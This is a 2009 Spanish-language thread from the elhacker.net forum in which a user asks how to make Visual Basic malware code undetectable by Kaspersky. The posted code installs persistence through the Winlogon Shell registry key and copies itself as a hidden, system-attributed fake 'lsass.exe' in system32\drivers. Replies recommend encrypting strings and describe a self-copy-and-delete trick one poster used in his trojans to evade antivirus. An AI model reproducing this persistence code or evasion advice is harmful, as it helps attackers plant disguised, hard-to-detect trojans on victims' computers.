elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Indetectabilizar unas lineas en vb		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Indetectabilizar unas lineas en vb  (Leído 2,797 veces)
demoniox12

Desconectado Desconectado

Mensajes: 204


El conocimiento es poder


Ver Perfil WWW
Indetectabilizar unas lineas en vb
« en: 4 Marzo 2009, 15:51 pm »
Buenas,

el pedazo de codigo que detecta es:

Código
  1. Reg_Crea_KeyConValor HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "Explorer.exe, " & Environ("WinDir") & "\system32\drivers\lsass.exe"
  2. FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("WinDir") & "\system32\drivers\lsass.exe" 'lo copiamos
  3. SetAttr Environ("WinDir") & "\system32\drivers\lsass.exe", vbHidden + vbReadOnly + vbSystem
  4. DoEvents
  5. Shell Environ("WinDir") & "\system32\drivers\lsass.exe" 'y lo ejecutamos

Les digo las combinaciones que detecta:

cuando FileCopy no esta no lo detecta, cuando reg_crea_keyconvalor y shell no estan tampoco lo detecta, cuando solo le cambio el nombre al FileCopy digamos le cambio el lsass no lo detecta, intente ponerlo en funcion para que saque de ahi el nombre, tambien intente ponerlo con strreverse.. nadap.. alguna solucion?

Saludos!

PD: el Antivirus es el Kaspersky
« Última modificación: 4 Marzo 2009, 16:01 pm por demoniox12 » En línea
By Demoniox
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Indetectabilizar unas lineas en vb
« Respuesta #1 en: 4 Marzo 2009, 22:14 pm »
Que tal si encriptas las cadenas?
Citar
[KPC], cifra tus proyectos en VB

Saludos ;)
En línea
Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: Indetectabilizar unas lineas en vb
« Respuesta #2 en: 5 Marzo 2009, 17:08 pm »
asi es, deberias buscar en google, una funcion para cifrar strings
Igualmente en este foro recuerdo haer posteado algo asi. dejame ver...
En línea

Encuentros por Video y Chat !!
vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: Indetectabilizar unas lineas en vb
« Respuesta #3 en: 5 Marzo 2009, 19:08 pm »
te digo lo q yo hacia en mis troyanos...

para q se copien a otra carpeta.. no usaba filecopy xq tb me lo detectaba... lo habria en una cadena a si mismo.. creaba el archivo en otra carpeta... y cerraba el archivo... luego lo ejecutaba al nuevo archivo.. este esperaba 10 seg a q el otro termine y se cierre.. lo buscaba y lo borraba...

luego para el regedit simplemente encriptaba el texto plano y ya no te lo detecta

SALUDOS
En línea
demoniox12

Desconectado Desconectado

Mensajes: 204


El conocimiento es poder


Ver Perfil WWW
Re: Indetectabilizar unas lineas en vb
« Respuesta #4 en: 6 Marzo 2009, 16:43 pm »
Muchas gracias muchachos!

Saludos!
En línea
By Demoniox
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Crear unas lineas para un .bat
Scripting 		Xandrovk 3 5,542 Último mensaje 5 Enero 2011, 18:59 pm
por leogtz
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines